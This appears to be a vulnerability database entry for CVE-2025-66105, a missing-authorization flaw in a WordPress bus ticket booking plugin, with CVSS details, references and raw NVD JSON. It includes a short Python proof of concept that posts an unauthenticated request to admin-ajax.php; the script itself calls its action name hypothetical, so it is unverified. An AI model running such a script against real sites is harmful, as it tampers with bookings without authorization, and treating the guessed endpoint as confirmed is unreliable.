CVE-2025-66105

Description

Missing Authorization vulnerability in Magepeople inc. Bus Ticket Booking with Seat Reservation allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bus Ticket Booking with Seat Reservation: from n/a before 5.6.8.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Bus Ticket Booking with Seat Reservation < 5.6.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2025-66105: Missing Authorization in Bus Ticket Booking Plugin
This script demonstrates how an unauthenticated user can potentially trigger
a sensitive action due to broken access control.
"""

import requests

def exploit(target_url):
    # The vulnerable endpoint is typically wp-admin/admin-ajax.php
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload targeting the vulnerable action (action name may vary based on version)
    # This simulates booking or modifying data without authentication
    payload = {
        "action": "wbtb_book_seat",  # Hypothetical action parameter for the plugin
        "bus_id": "1",
        "seat_info": "exploited_data"
    }

    try:
        print(f"[*] Sending request to {ajax_url}...")
        response = requests.post(ajax_url, data=payload, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if action was performed.")
            print(f"[+] Response: {response.text[:100]}")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66105
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66105
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66105/
[4] VulDB https://vuldb.com/cve/CVE-2025-66105
[5] https://patchstack.com/database/wordpress/plugin/bus-ticket-booking-with-seat-reservation/vulnerability/wordpress-bus-ticket-booking-with-seat-reservation-plugin-5-6-8-broken-access-control-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66105", "sourceIdentifier": "[email protected]", "published": "2026-05-07T09:16:26.497", "lastModified": "2026-05-07T14:00:48.567", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Magepeople inc. Bus Ticket Booking with Seat Reservation allows Exploiting Incorrectly Configured Access Control Security Levels.\n\nThis issue affects Bus Ticket Booking with Seat Reservation: from n/a before 5.6.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/bus-ticket-booking-with-seat-reservation/vulnerability/wordpress-bus-ticket-booking-with-seat-reservation-plugin-5-6-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}